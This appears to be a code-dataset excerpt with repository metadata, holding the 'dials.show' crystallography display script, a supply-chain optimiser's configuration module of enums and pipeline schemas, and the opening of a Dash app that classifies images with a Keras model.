"BSD-3-Clause"
] | null | null | null |
import os
import sys
import numpy as np
import iotbx.phil
from cctbx import uctbx
from dxtbx.model.experiment_list import ExperimentListFactory
from scitbx.math import five_number_summary
import dials.util
from dials.array_family import flex
from dials.util import Sorry, tabulate
help_message = """
Examples::
dials.show models.expt
dials.show image_*.cbf
dials.show observations.refl
"""
phil_scope = iotbx.phil.parse(
"""\
show_scan_varying = False
.type = bool
.help = "Whether or not to show the crystal at each scan point."
show_shared_models = False
.type = bool
.help = "Show which models are linked to which experiments"
show_all_reflection_data = False
.type = bool
.help = "Whether or not to print individual reflections"
show_intensities = False
.type = bool
show_centroids = False
.type = bool
show_profile_fit = False
.type = bool
show_flags = False
.type = bool
.help = "Show a summary table of reflection flags"
show_identifiers = False
.type = bool
.help = "Show experiment identifiers map if set"
image_statistics{
show_corrected = False
.type = bool
.help = "Show statistics on the distribution of values in each corrected image"
show_raw = False
.type = bool
.help = "Show statistics on the distribution of values in each raw image"
}
max_reflections = None
.type = int
.help = "Limit the number of reflections in the output."
""",
process_includes=True,
)
def beam_centre_mm(detector, s0):
x, y = (None, None)
for panel_id, panel in enumerate(detector):
try:
x, y = panel.get_ray_intersection(s0)
except RuntimeError:
continue
else:
if panel.is_coord_valid_mm((x, y)):
break
else:
x, y = (None, None)
return panel_id, (x, y)
def beam_centre_raw_image_px(detector, s0):
panel_id, (x, y) = beam_centre_mm(detector, s0)
panel = detector[panel_id]
x_px, y_px = panel.millimeter_to_pixel((x, y))
offset = panel.get_raw_image_offset()
return x_px + offset[0], y_px + offset[1]
def show_beam(detector, beam):
# standard static beam model string
s = str(beam)
# report whether the beam is scan-varying
if beam.num_scan_points > 0:
s += " s0 sampled at " + str(beam.num_scan_points) + " scan points\n"
# add static model beam centres
panel_id, (x, y) = beam_centre_mm(detector, beam.get_s0())
if panel_id >= 0 and x is not None and y is not None:
x_px, y_px = detector[panel_id].millimeter_to_pixel((x, y))
if len(detector) > 1:
beam_centre_mm_str = " mm: panel %i, (%.2f,%.2f)" % (panel_id, x, y)
beam_centre_px_str = " px: panel %i, (%.2f,%.2f)" % (
panel_id,
x_px,
y_px,
)
x_raw_px, y_raw_px = beam_centre_raw_image_px(detector, beam.get_s0())
beam_centre_raw_px_str = " px, raw image: ({:.2f},{:.2f})".format(
x_raw_px,
y_raw_px,
)
x_raw_mm, y_raw_mm = detector[panel_id].pixel_to_millimeter(
(x_raw_px, y_raw_px)
)
beam_centre_raw_mm_str = " mm, raw image: ({:.2f},{:.2f})".format(
x_raw_mm,
y_raw_mm,
)
else:
beam_centre_mm_str = f" mm: ({x:.2f},{y:.2f})"
beam_centre_px_str = f" px: ({x_px:.2f},{y_px:.2f})"
beam_centre_raw_px_str = ""
beam_centre_raw_mm_str = ""
s += "\nBeam centre: \n"
s += beam_centre_mm_str + "\n" + beam_centre_px_str + "\n"
if beam_centre_raw_mm_str:
s += beam_centre_raw_mm_str + "\n"
if beam_centre_raw_px_str:
s += beam_centre_raw_px_str + "\n"
# report range of scan-varying model beam centres
if beam.num_scan_points > 0:
# get scan-varying beam centres, ensuring all on same panel
sv_s0 = beam.get_s0_at_scan_points()
impacts = [beam_centre_mm(detector, s0) for s0 in sv_s0]
pnl, xy = zip(*impacts)
uniq_pnls = set(pnl)
if len(uniq_pnls) > 1 or min(uniq_pnls) < 0:
return s
if any(e == (None, None) for e in xy):
return s
pnl = list(uniq_pnls)[0]
x_mm, y_mm = zip(*xy)
# convert to pixels
xy = [detector[pnl].millimeter_to_pixel(e) for e in xy]
x_px, y_px = zip(*xy)
s += "Beam centre range (mm): ([{:.2f},{:.2f}],[{:.2f},{:.2f}])\n".format(
min(x_mm),
max(x_mm),
min(y_mm),
max(y_mm),
)
s += "Beam centre range (px): ([{:.2f},{:.2f}],[{:.2f},{:.2f}])\n".format(
min(x_px),
max(x_px),
min(y_px),
max(y_px),
)
return s
def show_goniometer(goniometer):
# standard static goniometer model string
s = str(goniometer)
# report whether the goniometer is scan-varying
if goniometer.num_scan_points > 0:
s += (
" Setting rotation sampled at "
+ str(goniometer.num_scan_points)
+ " scan points\n"
)
return s
@dials.util.show_mail_handle_errors()
def run(args=None):
import dials.util.log
dials.util.log.print_banner()
from dials.util.options import OptionParser, reflections_and_experiments_from_files
usage = "dials.show [options] models.expt | image_*.cbf"
parser = OptionParser(
usage=usage,
phil=phil_scope,
read_experiments=True,
read_experiments_from_images=True,
read_reflections=True,
check_format=False,
epilog=help_message,
)
params, options = parser.parse_args(args=args, show_diff_phil=True)
reflections, experiments = reflections_and_experiments_from_files(
params.input.reflections, params.input.experiments
)
if len(experiments) == 0 and len(reflections) == 0:
parser.print_help()
exit()
if len(experiments):
if not all(e.detector for e in experiments):
sys.exit("Error: experiment has no detector")
if not all(e.beam for e in experiments):
sys.exit("Error: experiment has no beam")
print(show_experiments(experiments, show_scan_varying=params.show_scan_varying))
if params.image_statistics.show_raw:
show_image_statistics(experiments, "raw")
if params.image_statistics.show_corrected:
show_image_statistics(experiments, "corrected")
if params.show_shared_models:
print()
print(model_connectivity(experiments))
if len(reflections):
print(
show_reflections(
reflections,
show_intensities=params.show_intensities,
show_profile_fit=params.show_profile_fit,
show_centroids=params.show_centroids,
show_all_reflection_data=params.show_all_reflection_data,
show_flags=params.show_flags,
max_reflections=params.max_reflections,
show_identifiers=params.show_identifiers,
)
)
def show_experiments(experiments, show_scan_varying=False):
text = []
for i_expt, expt in enumerate(experiments):
text.append("Experiment %i:" % i_expt)
format_class = expt.imageset.get_format_class()
if format_class.__name__ != "Format":
text.append(f"Format class: {format_class.__name__}")
if expt.identifier != "":
text.append(f"Experiment identifier: {expt.identifier}")
try:
template = expt.imageset.get_template()
except AttributeError:
template = None
if template:
text.append(f"Image template: {template}")
text.append(str(expt.detector))
text.append(
"Max resolution (at corners): %f"
% (expt.detector.get_max_resolution(expt.beam.get_s0()))
)
text.append(
"Max resolution (inscribed): %f"
% (expt.detector.get_max_inscribed_resolution(expt.beam.get_s0()))
)
text.append("")
text.append(show_beam(expt.detector, expt.beam))
if expt.scan is not None:
text.append(str(expt.scan))
if expt.goniometer is not None:
text.append(show_goniometer(expt.goniometer))
if expt.crystal is not None:
text.append(expt.crystal.as_str(show_scan_varying=show_scan_varying))
if expt.crystal.num_scan_points:
abc = flex.vec3_double()
angles = flex.vec3_double()
for n in range(expt.crystal.num_scan_points):
(
a,
b,
c,
alpha,
beta,
gamma,
) = expt.crystal.get_unit_cell_at_scan_point(n).parameters()
abc.append((a, b, c))
angles.append((alpha, beta, gamma))
a, b, c = abc.mean()
alpha, beta, gamma = angles.mean()
mean_unit_cell = uctbx.unit_cell((a, b, c, alpha, beta, gamma))
text.append(f" Average unit cell: {mean_unit_cell}")
if expt.profile is not None:
text.append(str(expt.profile))
if expt.scaling_model is not None:
text.append(str(expt.scaling_model))
return "\n".join(text)
def show_image_statistics(experiments, im_type):
if im_type == "raw":
raw = True
elif im_type == "corrected":
raw = False
else:
raise ValueError(f"Unknown im_type: {im_type}")
    # To show image statistics, check_format has to be True, so we have to
    # reinstantiate the experiment list here
try:
experiments = ExperimentListFactory.from_json(
experiments.as_json(), check_format=True
)
except OSError as e:
raise Sorry(
f"Unable to read image data. Please check {e.filename} is accessible"
)
print(f"Five number summary of the {im_type} images")
for i_expt, expt in enumerate(experiments):
for i in range(len(expt.imageset)):
identifier = os.path.basename(expt.imageset.get_image_identifier(i))
if raw:
pnl_data = expt.imageset.get_raw_data(i)
else:
pnl_data = expt.imageset.get_corrected_data(i)
if not isinstance(pnl_data, tuple):
pnl_data = (pnl_data,)
flat_data = pnl_data[0].as_1d()
for p in pnl_data[1:]:
flat_data.extend(p.as_1d())
fns = five_number_summary(flat_data)
print(
"{}: Min: {:.1f} Q1: {:.1f} Med: {:.1f} Q3: {:.1f} Max: {:.1f}".format(
identifier, *fns
)
)
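# A minimal sketch of what the five-number summary above reports, using numpy
# percentiles instead of the five_number_summary helper used by dials (the
# quartile interpolation may differ slightly; the sample data is made up).
def _demo_five_number_summary(values=(1.0, 2.0, 4.0, 7.0, 11.0)):
    import numpy as np
    return tuple(np.percentile(np.asarray(values), [0, 25, 50, 75, 100]))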
def model_connectivity(experiments):
def model_connectivity_impl(experiments, model):
text = [""]
text.append(f"{model.capitalize()}:")
models = getattr(experiments, f"{model}s")()
rows = [[""] + [str(j) for j in range(len(models))]]
for j, e in enumerate(experiments):
row = ["Experiment %d" % j]
for m in models:
if getattr(e, model) is m:
row.append("x")
else:
row.append(".")
rows.append(row)
text.append(tabulate(rows, tablefmt="plain"))
return text
if len(experiments) == 1:
return ""
text = []
text.append("Experiment / Models")
text.extend(model_connectivity_impl(experiments, "detector"))
text.extend(model_connectivity_impl(experiments, "crystal"))
text.extend(model_connectivity_impl(experiments, "beam"))
return "\n".join(text)
def _create_flag_count_table(table):
"""Generate a summary table of flag values in a reflection table.
:param table: A reflection table
:returns: A string of the formatted flags table
"""
# Calculate the counts of entries that match each flag
numpy_flags = table["flags"].as_numpy_array()
flag_count = {
flag: np.sum(numpy_flags & value != 0)
for value, flag in table.flags.values.items()
}
# Work out the numeric-value order of the flags
flag_order = sorted(table.flags.values.values(), key=lambda x: x.real)
# Build the actual table
flag_rows = [["Flag", "Count", "%"]]
max_count_len = max(5, len(str(max(flag_count.values()))))
last_flag = None
for flag in flag_order:
indent = ""
# As a hint for reading, indent any 'summary' flags.
# A summary flag is any flag which overlaps with the previous one.
if last_flag and (last_flag.real & flag.real):
indent = " "
last_flag = flag
# Add the row to the table we're building
flag_rows.append(
[
indent + flag.name,
"{:{:d}d}".format(flag_count[flag], max_count_len),
f"{100 * flag_count[flag] / len(table):5.01f}",
]
)
# Build the array of output strings
text = []
text.append("Reflection flags:")
text.append(tabulate(flag_rows, headers="firstrow"))
return "\n".join(text)
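# A minimal sketch of the bitmask counting used above: a reflection matches a
# flag when the bitwise AND of its flag word with that flag's value is nonzero
# (& binds tighter than != in Python). The flag names and values here are
# illustrative, not the real dials flag enumeration.
def _demo_flag_counting():
    import numpy as np
    flag_words = np.array([0b001, 0b011, 0b111, 0b100])
    flag_values = {0b001: "predicted", 0b010: "indexed", 0b100: "integrated"}
    return {name: int(np.sum(flag_words & value != 0))
            for value, name in flag_values.items()}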
def show_reflections(
reflections,
show_intensities=False,
show_profile_fit=False,
show_centroids=False,
show_all_reflection_data=False,
show_flags=False,
max_reflections=None,
show_identifiers=False,
):
text = []
from orderedset import OrderedSet
formats = {
"miller_index": "%i, %i, %i",
"d": "%.2f",
"qe": "%.3f",
"dqe": "%.3f",
"id": "%i",
"imageset_id": "%i",
"panel": "%i",
"flags": "%i",
"background.mean": "%.1f",
"background.dispersion": "%.1f",
"background.mse": "%.1f",
"background.sum.value": "%.1f",
"background.sum.variance": "%.1f",
"intensity.prf.value": "%.1f",
"intensity.prf.variance": "%.1f",
"intensity.sum.value": "%.1f",
"intensity.sum.variance": "%.1f",
"intensity.cor.value": "%.1f",
"intensity.cor.variance": "%.1f",
"intensity.scale.value": "%.1f",
"intensity.scale.variance": "%.1f",
"Ih_values": "%.1f",
"lp": "%.3f",
"num_pixels.background": "%i",
"num_pixels.background_used": "%i",
"num_pixels.foreground": "%i",
"num_pixels.valid": "%i",
"partial_id": "%i",
"partiality": "%.4f",
"profile.correlation": "%.3f",
"profile.rmsd": "%.3f",
"xyzcal.mm": "%.2f, %.2f, %.2f",
"xyzcal.px": "%.2f, %.2f, %.2f",
"delpsical.rad": "%.3f",
"delpsical2": "%.3f",
"delpsical.weights": "%.3f",
"xyzobs.mm.value": "%.2f, %.2f, %.2f",
"xyzobs.mm.variance": "%.4e, %.4e, %.4e",
"xyzobs.px.value": "%.2f, %.2f, %.2f",
"xyzobs.px.variance": "%.4f, %.4f, %.4f",
"s1": "%.4f, %.4f, %.4f",
"s2": "%.4f, %.4f, %.4f",
"shoebox": "%.1f",
"rlp": "%.4f, %.4f, %.4f",
"zeta": "%.3f",
"x_resid": "%.3f",
"x_resid2": "%.3f",
"y_resid": "%.3f",
"y_resid2": "%.3f",
"kapton_absorption_correction": "%.3f",
"kapton_absorption_correction_sigmas": "%.3f",
"inverse_scale_factor": "%.3f",
"inverse_scale_factor_variance": "%.3f",
}
for rlist in reflections:
from dials.algorithms.shoebox import MaskCode
foreground_valid = MaskCode.Valid | MaskCode.Foreground
text.append("")
text.append(f"Reflection list contains {len(rlist)} reflections")
if len(rlist) == 0:
continue
rows = [["Column", "min", "max", "mean"]]
for k, col in rlist.cols():
if k in formats and "%" not in formats.get(k, "%s"):
# Allow blanking out of entries that wouldn't make sense
rows.append(
[
k,
formats.get(k, "%s"),
formats.get(k, "%s"),
formats.get(k, "%s"),
]
)
elif type(col) in (flex.double, flex.int, flex.size_t):
if type(col) in (flex.int, flex.size_t):
col = col.as_double()
rows.append(
[
k,
formats.get(k, "%s") % flex.min(col),
formats.get(k, "%s") % flex.max(col),
formats.get(k, "%s") % flex.mean(col),
]
)
elif type(col) in (flex.vec3_double, flex.miller_index):
if isinstance(col, flex.miller_index):
col = col.as_vec3_double()
rows.append(
[
k,
formats.get(k, "%s") % col.min(),
formats.get(k, "%s") % col.max(),
formats.get(k, "%s") % col.mean(),
]
)
elif isinstance(col, flex.shoebox):
rows.append([k, "", "", ""])
si = col.summed_intensity().observed_value()
rows.append(
[
" summed I",
formats.get(k, "%s") % flex.min(si),
formats.get(k, "%s") % flex.max(si),
formats.get(k, "%s") % flex.mean(si),
]
)
x1, x2, y1, y2, z1, z2 = col.bounding_boxes().parts()
bbox_sizes = ((z2 - z1) * (y2 - y1) * (x2 - x1)).as_double()
rows.append(
[
" N pix",
formats.get(k, "%s") % flex.min(bbox_sizes),
formats.get(k, "%s") % flex.max(bbox_sizes),
formats.get(k, "%s") % flex.mean(bbox_sizes),
]
)
fore_valid = col.count_mask_values(foreground_valid).as_double()
rows.append(
[
" N valid foreground pix",
formats.get(k, "%s") % flex.min(fore_valid),
formats.get(k, "%s") % flex.max(fore_valid),
formats.get(k, "%s") % flex.mean(fore_valid),
]
)
text.append(tabulate(rows, headers="firstrow"))
if show_flags:
text.append(_create_flag_count_table(rlist))
if show_identifiers:
if rlist.experiment_identifiers():
text.append(
"""Experiment identifiers id-map values:\n%s"""
% (
"\n".join(
"id:"
+ str(k)
+ " -> experiment identifier:"
+ str(rlist.experiment_identifiers()[k])
for k in rlist.experiment_identifiers().keys()
)
)
)
intensity_keys = (
"miller_index",
"d",
"intensity.prf.value",
"intensity.prf.variance",
"intensity.sum.value",
"intensity.sum.variance",
"background.mean",
"profile.correlation",
"profile.rmsd",
)
profile_fit_keys = ("miller_index", "d")
centroid_keys = (
"miller_index",
"d",
"xyzcal.mm",
"xyzcal.px",
"xyzobs.mm.value",
"xyzobs.mm.variance",
"xyzobs.px.value",
"xyzobs.px.variance",
)
keys_to_print = OrderedSet()
if show_intensities:
for k in intensity_keys:
keys_to_print.add(k)
if show_profile_fit:
for k in profile_fit_keys:
keys_to_print.add(k)
if show_centroids:
for k in centroid_keys:
keys_to_print.add(k)
if show_all_reflection_data:
for k in formats:
keys_to_print.add(k)
def format_column(key, data, format_strings=None):
if isinstance(data, flex.vec3_double):
c_strings = [
c.as_string(format_strings[i].strip())
for i, c in enumerate(data.parts())
]
elif isinstance(data, flex.miller_index):
c_strings = [
c.as_string(format_strings[i].strip())
for i, c in enumerate(data.as_vec3_double().parts())
]
elif isinstance(data, flex.size_t):
c_strings = [data.as_int().as_string(format_strings[0].strip())]
elif isinstance(data, flex.shoebox):
x1, x2, y1, y2, z1, z2 = data.bounding_boxes().parts()
bbox_sizes = ((z2 - z1) * (y2 - y1) * (x2 - x1)).as_double()
c_strings = [bbox_sizes.as_string(format_strings[0].strip())]
key += " (N pix)"
else:
c_strings = [data.as_string(format_strings[0].strip())]
column = flex.std_string()
max_element_lengths = [c.max_element_length() for c in c_strings]
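        # right-align each element to the widest entry in its sub-column, then
        # pad the joined row to at least the width of the column header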
for i in range(len(c_strings[0])):
column.append(
f"%{len(key)}s"
% ", ".join(
("%%%is" % max_element_lengths[j]) % c_strings[j][i]
for j in range(len(c_strings))
)
)
return column
if keys_to_print:
keys = [k for k in keys_to_print if k in rlist]
if max_reflections is not None:
max_reflections = min(len(rlist), max_reflections)
else:
max_reflections = len(rlist)
columns = []
for k in keys:
columns.append(
format_column(k, rlist[k], format_strings=formats[k].split(","))
)
text.append("")
text.append("Printing %i of %i reflections:" % (max_reflections, len(rlist)))
line = []
for j in range(len(columns)):
key = keys[j]
if key == "shoebox":
key += " (N pix)"
width = max(len(key), columns[j].max_element_length())
line.append("%%%is" % width % key)
text.append(" ".join(line))
for i in range(max_reflections):
line = (c[i] for c in columns)
text.append(" ".join(line))
return "\n".join(text)
if __name__ == "__main__":
run()
| 32.992764
| 88
| 0.530485
| 2,690
| 22,798
| 4.302974
| 0.141636
| 0.025054
| 0.018056
| 0.019698
| 0.259698
| 0.173823
| 0.1073
| 0.068683
| 0.040432
| 0.036112
| 0
| 0.01114
| 0.342442
| 22,798
| 690
| 89
| 33.04058
| 0.76099
| 0.0411
| 0
| 0.134191
| 0
| 0.001838
| 0.13467
| 0.023847
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022059
| false
| 0
| 0.025735
| 0
| 0.071691
| 0.027574
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a477c71ec5eb0f689387ca230eaa223627c82b
| 8,749
|
py
|
Python
|
app/config/env_jesa.py
|
OuissalTAIM/jenkins
|
7ea5bcdeb6c0bb3cc14c2826a68e4f521de163c1
|
[
"BSD-1-Clause"
] | null | null | null |
app/config/env_jesa.py
|
OuissalTAIM/jenkins
|
7ea5bcdeb6c0bb3cc14c2826a68e4f521de163c1
|
[
"BSD-1-Clause"
] | 6
|
2021-02-02T22:52:41.000Z
|
2022-03-12T00:37:30.000Z
|
app/config/env_jesa.py
|
OuissalTAIM/jenkins
|
7ea5bcdeb6c0bb3cc14c2826a68e4f521de163c1
|
[
"BSD-1-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from enum import Enum, IntEnum, unique
import os
APP_NAME = "mine2farm"
NETWORK_NAME = "CenterAxis"
LOG_LEVEL_CONSOLE = "WARNING"
LOG_LEVEL_FILE = "INFO"
APP_FOLDER = os.getenv("JESA_MINE2FARM_HOME", "C:/GitRepos/mine2farm/")
LOG_FOLDER = APP_FOLDER + "app/log/"
LOG_FILE = "%(asctime)s_" + APP_NAME + ".log"  # the trailing 's' is required for a valid %-style placeholder
OUTPUT_FOLDER = "%s%s" % (APP_FOLDER, "outputs/")
CANVAS_URL = "http://127.0.0.1/canvas.xlsm"
# DB
DB_NAME = None
DB_HOST = "172.29.161.208"
DB_PORT = 5006
DATA_SERVICE_ADD = "172.29.161.208"
DATA_SERVICE_PORT = 5001
# Results
DB_RESULT_NAME = "%s_results" % DB_NAME if DB_NAME is not None else None
DB_DETAILED_RESULT_COLLECTION_NAME = "detailed"
DB_GLOBAL_RESULT_COLLECTION_NAME = "global"
DB_GLOBAL_BEST_RESULT_COLLECTION_NAME = "global_best"
DB_DETAILED_BEST_RESULT_COLLECTION_NAME = "detailed_best"
DB_SENSITIVITY_COLLECTION_NAME = "sensitivity"
RESULT_BATCHES_SIZE = 25
HEAD_DATA_BITS = 17
DB_NAME_BITS = 20
RANDOMIZE_RESULTS = False
# RabbitMQ
RABBITMQ_SERVER = "localhost"
RABBITMQ_SIMULATOR_QUEUE_NAME = "SIMULATE"
RABBITMQ_CYCLE = 3
RABBITMQ_DETAILED_RESULT_QUEUE_NAME = "SAVE_DETAIL"
RABBITMQ_GLOBAL_RESULT_QUEUE_NAME = "SAVE_GLOBAL"
RABBITMQ_MAX_WORKER = RABBITMQ_CYCLE
RABBITMQ_PATH = "C:\\Program Files\\RabbitMQ Server\\rabbitmq_server-3.8.1\\sbin"
# Memcached
MEMCACHED_SERVER = 'localhost'
MEMCACHED_PORT = 11211
# Dashboard
DB_LOAD_FROM_SERVICE = True
# Monitoring
MONITORING_APP_NAME = "mine2farm_monitor"
MONITORING_SERVER = "172.29.161.208"
MONITORING_PORT = 5002
MONITORING_DB_NAME = "task_history"
MONITORING_COLLECTION_HISTORY_NAME = "task"
MONITORING_COLLECTION_HISTORY_BEST_NAME = "best_scenarios_history"
MONITORING_STEP = 1
MONITORING_NB_PAGE = 10
# Mongodb-bi
MONGODB_BI_PATH = "C:\\Program Files\\MongoDB\\Connector for BI\\2.13\\bin"
# Mongodb
MONGO_SERVER_PATH = "C:\\Program Files\\MongoDB\\Server\\4.0\\bin"
# params
LOGISTICS_LP = False
MODE_DEBUG = False
GRANUL_RELAX = False
class HTML_STATUS(IntEnum):
ERROR = -1
OK = 0
# Model
MONIKER_SEPARATOR = "/"
WACC = 0.1
T0 = 2020
TMAX = 2031
class PriceParams(Enum):
WACC = 0
TENOR = 1
VOLUME = 2
class PipelineType(Enum):
COMMON = 0
PRODUCER = 1
TRANSPORT = 2
BALANCE = 3
PRICE = 4
SALES = 5
@unique
class PipelineLayer(IntEnum):
UNDEFINED = -1
MINE = 0
BENEFICIATION = 1
SAP = 2
PAP = 3
GRANULATION = 4
LOGISTICS = 5
RAW_MATERIALS = 8
COMMON = 9
SALES_PLAN = 10
MINE_BENEFICIATION = 11
UNIT_CONVERSION_MATRIX = 12
PIPELINE_SCHEMA = {
PipelineLayer.COMMON: {
"type": PipelineType.COMMON,
"dico": ["location", "opex", "unit", "currency", "output", "names", "products"]
},
PipelineLayer.MINE: {
"type": PipelineType.PRODUCER,
"dico": ["mine.name", "mine.extraction", "mine.quality", "mine.capex"],
"options": "mining_options",
"production": "mining_specific_production",
"opex": "mining_opex___specific_consumptions",
"capex": "mining_capex",
"priority_mines": "prioritymines"
},
PipelineLayer.BENEFICIATION: {
"type": PipelineType.PRODUCER,
"dico": ["beneficiation.name", "beneficitation.process", "beneficitation.quality", "beneficitation.capex"],
"options": "beneficiation_options",
"production": "beneficiation_production",
"opex": "beneficiation_opex___specific_consumptions",
"capex": "beneficiation_capex"
},
PipelineLayer.SAP: {
"type": PipelineType.PRODUCER,
"dico": ["sap.name", "sap.process", "sap.product", "sap.capex", "sap.capacity[kt]"],
"options": "sap___power_plant_options",
"production": "sap___power_plant_production",
"opex": "sap___power_plant_opex___specific_consumptions",
"capex": "sap___power_plant_capex",
"product_type": "sap.product"
},
PipelineLayer.PAP: {
"type": PipelineType.PRODUCER,
"dico": ["pap.name", "pap.process", "pap.product", "pap.capex", "pap.size[kt]", "pap.input"],
"options": "pap_options",
"production": "pap_production",
"opex": "pap_opex___specific_consumptions",
"capex": "pap_capex",
"product_type": "pap.product"
},
PipelineLayer.GRANULATION: {
"type": PipelineType.PRODUCER,
"dico": ["granulation.name", "granulation.process", "granulation.product", "granulation.capex", "granulation.input"],
"options": "granulation_options",
"production": "granulation_production",
"opex": "granulation_opex",
"capex": "granulation_capex"
},
PipelineLayer.LOGISTICS: {
"type": PipelineType.TRANSPORT,
"dico": ["logistics.name", "logistics.process", "logistics.product", "logistics.capex"],
"options": "logistics_options",
"production": None,
"opex": "logistics_opex",
"capex": "logistics_capex"
},
PipelineLayer.RAW_MATERIALS: {
"type": PipelineType.PRICE,
"data": "raw_materials"
},
PipelineLayer.SALES_PLAN: {
"type": PipelineType.SALES,
"data": "sales_plan"
},
PipelineLayer.UNIT_CONVERSION_MATRIX: {
"type": PipelineType.COMMON,
"data": "conv_matrix"
},
}
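# Minimal lookup sketch (assumed usage, not from the source): consumers can key
# into PIPELINE_SCHEMA by layer and branch on the pipeline type; producer
# layers carry "production"/"opex"/"capex" urls, while price/common layers
# carry a single "data" url.
def _demo_schema_lookup(layer=PipelineLayer.MINE):
    schema = PIPELINE_SCHEMA[layer]
    if schema["type"] == PipelineType.PRODUCER:
        return schema["production"], schema["opex"], schema["capex"]
    return schema.get("data")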
SUPPLY_CHAIN = "mine2port"
DEPARTURE_ARRIVAL = {SUPPLY_CHAIN: (PipelineLayer.MINE,),  # one-element tuple; a bare (X) is not a tuple
                     "sap2pap": (PipelineLayer.SAP, PipelineLayer.PAP)}
COMBO_NODES = {
PipelineLayer.MINE_BENEFICIATION: {
"url": "mining_wp_connections",
"upstream_layer": PipelineLayer.MINE,
"downstream_layer": PipelineLayer.BENEFICIATION
}
}
COMBO_NODES_SEPARATION = "--"
class FunctionType(Enum):
COST_PV = 0
CASH_COST = 1
FULL_COST = 2
class ScenarioGeneratorType(IntEnum):
FROM_PATHS = 0
FROM_OPTIONS = 1
SPECIFIC_SCENARIOS = 2
SCENARIO_GEN_TYPE = ScenarioGeneratorType.FROM_OPTIONS
PIPELINE_METADATA = {
PipelineLayer.MINE: {
"type": PipelineType.PRODUCER,
"production": ["Name", "Extraction", "Quality", "Unit"],
"opex": ["Name", "Extraction", "Capacity", "Item", "Unit"],
"capex": ["Name", "Extraction", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.BENEFICIATION: {
"type": PipelineType.PRODUCER,
"production": ["Process", "InputQuality", "OutputQuality", "Humidity", "Unit"],
"opex": ["Process", "InputQuality", "OutputQuality", "Item", "Unit"],
"capex": ["Name", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.SAP: {
"type": PipelineType.PRODUCER,
"production": ["Location", "Process", "Product", "Unit"],
"opex": ["Location", "Process", "Item", "Unit"],
"capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.PAP: {
"type": PipelineType.PRODUCER,
"production": ["Process", "Input", "Product", "Unit"],
"opex": ["Location", "Process", "Capacity", "Input", "Item", "Product", "Unit"],
"capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.GRANULATION: {
"type": PipelineType.PRODUCER,
"production": ["Process", "Input", "Product", "Unit"],
"opex": ["Location", "ProductionSite", "Process", "Capacity", "Product", "Item", "Unit"],
"capex": ["Location", "ProductionSite", "Product", "Process", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.LOGISTICS: {
"type": PipelineType.TRANSPORT,
"opex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit"],
"capex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit", "CAPEX"]
},
PipelineLayer.RAW_MATERIALS: {
"type": PipelineType.PRICE,
"columns": ["Item", "Unit"]
},
PipelineLayer.SALES_PLAN: {
"type": PipelineType.PRICE,
"columns": ["Type", "Product", "Unit"]
},
PipelineLayer.UNIT_CONVERSION_MATRIX: {
"type": PipelineType.COMMON,
"columns": ["Initial Unit", "Uniform Unit", "Conversion Rate"]
},
}
class ShuffleLevel(IntEnum):
UNDEFINED = 0
SHUFFLE_WITHOUT_PERM = 1
SHUFFLE_WITH_PERMUTATIONS = 2
SHUFFLE_WITH_PERMUTATIONS_WITH_FILTERS = 3
SHUFFLE_WITH_UNNAMED = 4
SHUFFLE_LEVELS = {
PipelineLayer.MINE: ShuffleLevel.UNDEFINED,
PipelineLayer.BENEFICIATION: ShuffleLevel.UNDEFINED,
PipelineLayer.SAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,
PipelineLayer.PAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED,
PipelineLayer.GRANULATION: ShuffleLevel.UNDEFINED,
PipelineLayer.LOGISTICS: ShuffleLevel.UNDEFINED,
PipelineLayer.MINE_BENEFICIATION: ShuffleLevel.UNDEFINED
}
| 29.758503
| 125
| 0.65356
| 896
| 8,749
| 6.129464
| 0.25558
| 0.055353
| 0.026038
| 0.03059
| 0.259104
| 0.159323
| 0.102877
| 0.065186
| 0.046249
| 0.025127
| 0
| 0.018384
| 0.197965
| 8,749
| 294
| 126
| 29.758503
| 0.764287
| 0.011887
| 0
| 0.17094
| 0
| 0
| 0.312833
| 0.060806
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008547
| 0
| 0.183761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a5619ddeca5e16cc4b5d0ebb8500be1708f077
| 6,001
|
py
|
Python
|
app/app.py
|
Moustique-bot/hands-on-2021
|
fd023f0a431f72ef2c48e3a469be42e2de9e2957
|
[
"MIT"
] | null | null | null |
app/app.py
|
Moustique-bot/hands-on-2021
|
fd023f0a431f72ef2c48e3a469be42e2de9e2957
|
[
"MIT"
] | null | null | null |
app/app.py
|
Moustique-bot/hands-on-2021
|
fd023f0a431f72ef2c48e3a469be42e2de9e2957
|
[
"MIT"
] | null | null | null |
import base64
import io
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
from dash.dependencies import Input, Output
import numpy as np
import tensorflow as tf
from PIL import Image
from constants import CLASSES
import yaml
with open('app.yaml') as yaml_data:
params = yaml.safe_load(yaml_data)
IMAGE_WIDTH = params['IMAGE_WIDTH']
IMAGE_HEIGHT = params['IMAGE_HEIGHT']
PATH_MODEL = params['PATH_MODEL']
# Load DNN model
classifier = tf.keras.models.load_model(PATH_MODEL)
def classify_image(image, model, image_box=None):
"""Classify image by model
Parameters
----------
content: image content
model: tf/keras classifier
Returns
-------
class id returned by model classifier
"""
images_list = []
image = image.resize((IMAGE_WIDTH, IMAGE_HEIGHT), box=image_box)
# box argument clips image to (x1, y1, x2, y2)
